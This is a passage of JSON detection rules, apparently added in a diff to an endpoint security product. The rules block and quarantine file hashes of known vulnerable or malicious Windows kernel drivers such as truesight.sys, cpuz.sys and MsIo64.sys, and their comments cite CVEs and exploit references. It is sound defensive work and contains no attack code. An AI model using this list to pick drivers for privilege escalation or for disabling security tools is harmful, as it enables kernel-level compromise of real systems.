+ "hl_testing_start_time": "2026-03-23T11:45:29.969723Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fab3f1dbc49bd9f0219156fe49d4423c311f529f7d3653f5f69d2b10b9b0bc98",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c193c419-54b5-5981-aff5-3b73bf831af3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613312Z",
+ "creation_date": "2026-03-23T11:45:29.613314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bf974f5d3489638a48ee508b4a8cfa0f0262909778ccdd2e871172b71654d89",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1a6fc31-6b00-53fb-82f9-b931ebf85818",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609593Z",
+ "creation_date": "2026-03-23T11:45:29.609595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "610dff57f635693812337813a3f03bb1c3c6b7b6cf5c3f39fbc334ff2a73b69a",
+ "comment": "RobbinHood ransomware malicious driver (aka rbnl.sys) [https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1b0e20e-7745-5a77-8598-ba3f68b2f610",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819464Z",
+ "creation_date": "2026-03-23T11:45:31.819466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62a27ad4d031df0740e7d56b8a5a3f0cf6049a5e61605ea960380d1d9f3b03dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1b19a4a-418e-5039-9ef0-05cf19e4e614",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160175Z",
+ "creation_date": "2026-03-23T11:45:31.160179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160187Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8e2c11c898653b7a85003685aeae9e960cc1f562b8a4429dbe0fbfc254764ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1b689fa-3785-57f4-a8ed-265fd004622c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492896Z",
+ "creation_date": "2026-03-23T11:45:31.492899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492908Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0436088396d3fda62bc30d7cd1c68f532f538784ec265a54eb42c324d2a8b63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1b97270-149b-570e-9be6-dc511bf5f320",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610958Z",
+ "creation_date": "2026-03-23T11:45:29.610960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3966d4b1e4f5442b8507f91b6dbde3523657b47fd2945d990249605727d231ec",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1bb1d40-6c25-593a-ac83-c339a837c519",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972020Z",
+ "creation_date": "2026-03-23T11:45:29.972022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77c5e95b872b1d815d6d3ed28b399ca39f3427eeb0143f49982120ff732285a9",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1d1ff91-9ab1-5a32-937a-a5db85e3f406",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812169Z",
+ "creation_date": "2026-03-23T11:45:31.812171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7fd0abc3f05184243363889c705786f10fe0bd85023f4cad4a0749ff7c431cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1e32740-d924-5edc-b527-eb9def0ebe2b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807446Z",
+ "creation_date": "2026-03-23T11:45:31.807448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20c3b13fd0da01f901fce7daf1eb7531fefb37be6f7a690efc1a22f4889f0199",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1ec604b-b474-5807-94a7-a57c6fa72233",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976428Z",
+ "creation_date": "2026-03-23T11:45:29.976430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1f07d58-e4f0-5f36-95f9-5705ba0c0479",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456248Z",
+ "creation_date": "2026-03-23T11:45:30.456252Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456260Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "698353791261d5a9ca3245ae8f86334493df554690ec7962895c2affe4050db2",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1fa2df2-2ca1-5590-9f0a-6f86235409a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480527Z",
+ "creation_date": "2026-03-23T11:45:31.480531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "512110fbb8ddf0c909e5676a94eaf0ad7a0847cc2a70692e8ed96ba82462cfbe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1fea586-d297-5e6b-aac3-18082bc390e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478773Z",
+ "creation_date": "2026-03-23T11:45:31.478777Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d269d6f031743967b7affefe29f0fb0d2315047676464aa23052da44410b1b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c209ab55-935e-5ff3-835d-46526c46e8fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474388Z",
+ "creation_date": "2026-03-23T11:45:30.474391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474399Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43eeac44acc2f0aefc02522f1d203b37798fec9232d5b6c5d266badc118a1d8b",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c20bbad5-dc53-56b2-982b-4c73c206bf10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614110Z",
+ "creation_date": "2026-03-23T11:45:29.614112Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614118Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f035948848432bc243704041739e49b528f35c82a5be922d9e3b8a4c44398ff",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c20cda53-0c27-5077-bc27-febff0fc74ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980029Z",
+ "creation_date": "2026-03-23T11:45:29.980031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980036Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4",
+ "comment": "Malicious Kernel Driver (aka wantd.sys) [https://www.loldrivers.io/drivers/892292f9-b87c-40a5-80e5-8c9b02914e8b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c215410f-0738-59c5-97cf-7472b4576aa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144141Z",
+ "creation_date": "2026-03-23T11:45:31.144143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb270140b9a9df701906b79419807945bd39aa552524a67a62e89110ce7d2dc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c215b303-b470-5821-98a2-4b1805df15f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146988Z",
+ "creation_date": "2026-03-23T11:45:31.146990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc8b53ebef91d234235dca92d368727db634afd4a4cf0f4cecb6eb1fc29260e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c21907d9-b23d-5529-affd-85088fb3e7cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474854Z",
+ "creation_date": "2026-03-23T11:45:30.474857Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fed2e6e84e5f7212a86ede773184d97fb11d24b5da26a030c833dd1bec4ec953",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c21b1101-98d1-5890-971e-21aef12051ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147094Z",
+ "creation_date": "2026-03-23T11:45:31.147096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c5718f3ef2a578761ac96209df9ba0d1c5636ea16530a88f2d2bd70e127f22e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c21be22e-404f-5306-926c-d34282d34b81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813115Z",
+ "creation_date": "2026-03-23T11:45:31.813118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c358142fe85e9e20006a5b85b5ce5f4b09ee6d726be739654ccfe393a6f7756",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c21ccb4a-ec32-5d38-9c87-89109f08d8c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827236Z",
+ "creation_date": "2026-03-23T11:45:30.827238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87cf6d683238be3246dac8aae352d0ca5197eba5493a98357f32efd954cdd20e",
